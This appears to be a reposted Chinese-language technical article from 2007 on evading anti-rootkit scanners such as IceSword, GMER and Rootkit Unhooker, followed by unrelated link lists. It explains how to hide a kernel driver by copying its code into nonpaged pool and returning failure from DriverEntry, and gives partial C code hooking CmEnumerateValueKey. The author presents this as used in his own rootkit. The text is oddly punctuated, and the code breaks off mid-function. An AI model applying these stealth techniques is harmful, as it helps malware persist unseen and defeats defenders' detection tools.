MJ0011
th_decoder@126;.;com
2007;-;10;-;24

本文描述了一些方法 ， 可以饒過目前主流的現(xiàn)代Anti;-;rootkit工具 ， 包括但不限于;:
Icesword;最新版
Gmer最新版
Rootkit;unhooker;最新版
DarkSpy;最新版
AVG;Anti;-;rootkit最新版
等等

目前的anti;-;rootkit工具中 ， 對(duì)于內(nèi)核模塊主要采用如下幾種掃描方式;:

1.;恢復(fù)ZwQuerySystemInformation的hook;,;然后利用功能號(hào)SystemModuleInformation進(jìn)行枚舉
例如Icesword

2.;遍歷PsLoadModuleList;,;Driver;/;Device;/;Section;Object鏈;,;或者TypeList鏈等;(;總之是找驅(qū)動(dòng)相關(guān)對(duì)象;);進(jìn)行枚舉
例如Rootkit;Unhooker;,;Gmer等

3.;內(nèi)核鏡象暴力搜索;,;搜索MZ;,;PE等等標(biāo)志結(jié)合進(jìn)行判斷內(nèi)存里是否有PE鏡象;,;如rootkit;unhooker;,;rutkowska的modgreper等 ， 通常只能顯示為unknow;image

4.;函數(shù)引用;,;各種routine/hook等;,;先HOOK一些常用函數(shù) ， 然后當(dāng)驅(qū)動(dòng)去調(diào)用這些函數(shù)時(shí) ， 記下其地址 ， 檢測(cè)時(shí)使用;,;或者是根據(jù)各種;routine;(;dispatch;routine;,;IDT;,;Image;Notfiy等;);或各種hook;(;inline;hook;,;iat;/;eat;hook等等;); ， 通常只能顯示為unknow;image或unknow;xxx;handler等

5.;使用系統(tǒng)ImageLoad;Notfiy;,;使用一個(gè)BOOT驅(qū)動(dòng) ， 記錄所有模塊load的消息;,;檢測(cè)時(shí)進(jìn)行分析;如AVG;Anti;-;rootkit等

先說饒過;1;,;2;,;3;,;5;的辦法
很簡(jiǎn)單 ， 使用諸如ZwSetSystemInformation的函數(shù)加載驅(qū)動(dòng) ， 然后在DriverEntry中分配NonPagedPool的內(nèi)存 ， 然后將功能代碼;/;函數(shù)copy到該內(nèi)存中 ， 然后進(jìn)行必要的HOOK ， 最后返回STATUS_UNSUCCESSFULL;.

這樣驅(qū)動(dòng)在PsLoadModuleList、各種對(duì)象鏈里就消失了 ， 自然也就不存在于ZwQuerySystemInformation枚舉的列表里
需要注意的是 ， copy到內(nèi)存中的代碼要盡量簡(jiǎn)單 ， 基本不會(huì)生成需要重定位的代碼了 ， 但調(diào)用系統(tǒng)函數(shù)還是要另想辦法

我的某個(gè)RK里是這樣做的 ， 例如A;Function用來hook;系統(tǒng)函數(shù)B;,;其中需要調(diào)用系統(tǒng)函數(shù)C ，

那么分配一塊內(nèi)存 ， 大小;=;len;(;A;); ;sizeof;(;ULONG;);*;2

在內(nèi)存的前兩個(gè)DWORD放OrgB;,;以及C的地址 ， 后面開始放函數(shù)代碼

函數(shù)中使用call; ;5;對(duì)自身的位置進(jìn)行定位 ， 找到內(nèi)存開始的位置 ， 然后得到OrgB和C

當(dāng)然也可以在COPY入內(nèi)存前自己用絕對(duì)地址定位函數(shù);~;不過不如這個(gè)方法靈活

相關(guān)代碼;:
//hook;call;CmEnumerateValueKey

void;InstallCMRegHook;()
{
PVOID;_CmEnumerateKeyValueLoc


_CmEnumerateKeyValueLoc;=;FindCmEnumerateValueKey;();
//找到;call;CmEnumerateValueKey

HookCodeLen;=;(;ULONG;);NopFunc8;-;(;ULONG;);NewCmEnumerateValueKey
//獲得NewCmEnumerateValueKey長(zhǎng)度

HookCode3;=;ExAllocatePoolWithTag;(;NonPagedPool;,
HookCodeLen; ;4;,
MEM_TAG_HOOKCODE3;);

//分配內(nèi)存

*(;ULONG;*);HookCode3;=;*(;ULONG;*);_CmEnumerateKeyValueLoc

//原函數(shù)地址放入內(nèi)存

RtlCopyMemory;((;PVOID;);HookCode3; ;sizeof;(;ULONG;);,;(;PVOID;);NewCmEnumerateValueKey;,;HookCodeLen;);

//copy函數(shù)代碼

DO_SPINLOCK;();
*(;ULONG;*);_CmEnumerateValueKeyLoc;=;HookCode3; ;sizeof;(;ULONG;);

//進(jìn)行HOOK

EXIT_SPINLOCK;();
return

}

NTSTATUS;NewCmEnumearateValueKey;(;IN;PVOID;KeyControlBlock;,
IN;ULONG;Index;,
IN;KEY_VALUE_INFORMATION_CLASS;KeyValueInformationClass;,
IN;PVOID;KeyValueInformation;,
IN;ULONG;KeyLength;,
IN;PULONG;ResultLength
)
{
//下面找到本函數(shù)開始地址 ， 并獲得保存在內(nèi)存中的OrgCmEnumerateValueKey的地址

推薦閱讀

• 

  苦瓜干如何涼拌好吃
• 

  9.2系統(tǒng)和9.1系統(tǒng)改進(jìn)
• 

  病字旁加且的讀音
• 

  家常黃瓜粉絲涼拌菜的做法
• 

  夢(mèng)見洗衣店 夢(mèng)見洗衣店洗衣服
• 

  切菜板什么材質(zhì)的健康,什么材質(zhì)的砧板最好
• 

  WPS Office APP表格插入圖表的方法
• 

  紋眉后怎么用生理鹽水
• 

  天堂鳥葉子卷起來發(fā)黃是什么原因 天堂鳥葉子卷起來發(fā)黃
• 

  貓的肋骨兩邊是一樣的嗎
• 

  qq空間好友動(dòng)態(tài)秒贊介紹及常見問題介紹
• 

  選擇音響的技巧是什么
• 

  麻將機(jī)操作盤玻璃的拆除及擦洗 怎么更換麻將機(jī)玻璃
• 

  書法的發(fā)展簡(jiǎn)史
• 

  56歲重大疾病保險(xiǎn)如何購買
• 

  豐田fs小車和大眾捷達(dá)小車哪個(gè)好，怎么選

• 康肅忿然曰爾安敢輕吾射的翻譯 康肅忿然曰爾安敢輕吾射的翻譯成現(xiàn)代漢語
• 預(yù)算會(huì)計(jì)是什么
• 現(xiàn)代標(biāo)志有幾種
• 現(xiàn)代學(xué)徒制是什么意思
• 什么叫現(xiàn)代學(xué)徒制班
• 現(xiàn)代學(xué)徒制是什么文憑
• opporeno2緊急聯(lián)系人怎么使用
• 什么是發(fā)酵工程
• 現(xiàn)代文化有哪些
• 現(xiàn)代年齡的分段稱呼